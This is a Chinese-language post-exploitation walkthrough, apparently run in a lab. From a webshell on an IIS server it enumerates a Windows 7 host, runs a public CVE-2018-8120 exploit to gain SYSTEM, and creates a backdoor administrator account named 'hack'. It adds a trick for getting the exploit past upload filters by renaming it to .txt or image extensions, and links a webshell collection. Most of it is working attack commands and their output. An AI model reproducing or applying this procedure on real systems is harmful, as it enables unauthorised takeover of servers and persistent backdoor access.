前言
這邊是模擬拿到了一個WebShell
的後滲透提權操作
提權過程
首先是看了看一個當前用戶權限,在菜刀中打開cmd:
C:\inetpub\wwwroot\bjgs_v2.1\> whoami
iis apppool\bjgs_v2.1
是一個IIS
的普通權限
C:\inetpub\wwwroot\bjgs_v2.1\> net user
\\ 的用戶帳戶
-------------------------------------------------------------------------------
Administrator Guest liuwx
命令運行完畢,但發生一個或多個錯誤。
C:\inetpub\wwwroot\bjgs_v2.1\> net user admin admin /add
發生系統錯誤 5。
拒絕訪問。
C:\inetpub\wwwroot\bjgs_v2.1\>
創建用戶:拒絕訪問
,那麼權限還是比較低的!
先是上傳個大馬
看看有沒有可讀可寫
的目錄:
得到一個目錄:
文件夾:C:\inetpub\wwwroot\bjgs_v2.1 可讀,可寫。
先看看當前主機的信息:
C:\inetpub\wwwroot\bjgs_v2.1\> systeminfo
主機名: LIUWX-PC
OS 名稱: Microsoft Windows 7 旗艦版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 製造商: Microsoft Corporation
OS 配置: 獨立工作站
OS 構件類型: Multiprocessor Free
註冊的所有人: liuwx
註冊的組織:
產品 ID: 00426-292-0000007-85837
初始安裝日期: 2019/4/16, 1:03:42
系統啓動時間: 2019/10/7, 9:39:32
系統製造商: VMware, Inc.
系統型號: VMware Virtual Platform
系統類型: x64-based PC
處理器: 安裝了 2 個處理器。
[01]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 Mhz
[02]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2017/5/19
Windows 目錄: C:\Windows
系統目錄: C:\Windows\system32
啓動設備: \Device\HarddiskVolume1
系統區域設置: zh-cn;中文(中國)
輸入法區域設置: zh-cn;中文(中國)
時區: (UTC+08:00)北京,重慶,香港特別行政區,烏魯木齊
物理內存總量: 3,103 MB
可用的物理內存: 1,834 MB
虛擬內存: 最大值: 6,205 MB
虛擬內存: 可用: 4,956 MB
虛擬內存: 使用中: 1,249 MB
頁面文件位置: C:\pagefile.sys
域: WORKGROUP
登錄服務器: 暫缺
修補程序: 安裝了 2 個修補程序。
[01]: KB2534111
[02]: KB976902
網卡: 安裝了 1 個 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
連接名: 本地連接
啓用 DHCP: 是
DHCP 服務器: 192.168.1.1
IP 地址
[01]: 192.168.1.106
[02]: fe80::10d5:df24:e351:af59
C:\inetpub\wwwroot\bjgs_v2.1\>
關鍵信息有:
操作系統是Windows 7 x64
補丁只打了兩個:KB2534111、KB976902
那麼我們就可以上傳*.exe
本地溢出提權!
這邊是在Github
上找到了一個提權exe
: https://github.com/alpha1ab/CVE-2018-8120
CVE-2018-8120 Windows LPE exploit
測試支持: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 Datacenter x64, Win2008 Enterprise x64 WinXP x32, Win2003 x32,Win2003 x64
原exp不支持xp,2003,當前代碼在原基礎上增加了對這兩個系統的支持
把exe
上傳到可讀可寫
的目錄:
先是使用exe
看了看當前權限:
[*] 磁盤列表 [ C:D: ]
C:\inetpub\wwwroot\bjgs_v2.1\> whoami
iis apppool\bjgs_v2.1
C:\inetpub\wwwroot\bjgs_v2.1\>
C:\inetpub\wwwroot\bjgs_v2.1\> CVE-2018-8120.exe "whoami"
CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)
[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.
[+] Trying to execute whoami as SYSTEM...
[+] Process created with pid 3132!
nt authority\system
C:\inetpub\wwwroot\bjgs_v2.1\>
是一個:nt authority\system
系統權限!
提權命令:(創建一個hack
用戶並且提升爲管理員組
)
CVE-2018-8120.exe "net user hack hack /add"
CVE-2018-8120.exe "net localgroup administrators hack /add"
C:\inetpub\wwwroot\bjgs_v2.1\> net user
\\ 的用戶帳戶
-------------------------------------------------------------------------------
Administrator Guest hack
liuwx
命令運行完畢,但發生一個或多個錯誤。
C:\inetpub\wwwroot\bjgs_v2.1\> net user hack
用戶名 hack
全名
註釋
用戶的註釋
國家/地區代碼 000 (系統默認值)
帳戶啓用 Yes
帳戶到期 從不
上次設置密碼 2019/10/7 11:04:04
密碼到期 2019/11/18 11:04:04
密碼可更改 2019/10/7 11:04:04
需要密碼 Yes
用戶可以更改密碼 Yes
允許的工作站 All
登錄腳本
用戶配置文件
主目錄
上次登錄 從不
可允許的登錄小時數 All
本地組成員 *Administrators
全局組成員 *None
命令成功完成。
提權成功!
番外篇
二進制文件後綴可任意修改
首先我們是有一個二進制文件:CVE-2018-8120.exe
接着把exe
後綴改成txt
CVE-2018-8120.txt “whoami”
C:\inetpub\wwwroot\bjgs_v2.1\> CVE-2018-8120.txt "whoami"
CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)
[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.
[+] Trying to execute whoami as SYSTEM...
[+] Process created with pid 2700!
nt authority\system
可以看到,是可以執行的!
一般這種用於不能上傳exe
、bat
文件,我們就可以吧exe
文件修改爲可上傳的後綴文件也能照常運行!
圖片格式也是可以的!
aspx比asp權限大
如果網站支持aspx
腳本,那麼有的時候asp
的權限比較小,但是上傳了aspx
腳本後權限就比asp
要大一些!
因爲aspx
使用的是.net
技術。IIS 中默認不支持,ASPX
需要依賴於.net framework
…ASP只是腳本語言而已。ASP.NET
允許用戶使用IIS建立網絡服務。入侵的時候…asp
的木馬一般是guest
權限…APSX
的木馬一般是users
權限…iis6
默認以network service
身份運行。iis5
默認是aspnet ASP.NET
,IIS
的權限機制非常複雜,對每一層應用,都有不同的權限控制。總之..要求對asp.net
開放相應權限,纔可以讓你的網站完成相應的服務。ASP.net
程序的訪問權限由ASPNET
的權限來決定。ASPNET
隸屬於Users
組。所以ASPX
權限就要高一些…
WebSHELL集合 : https://github.com/tennc/webshell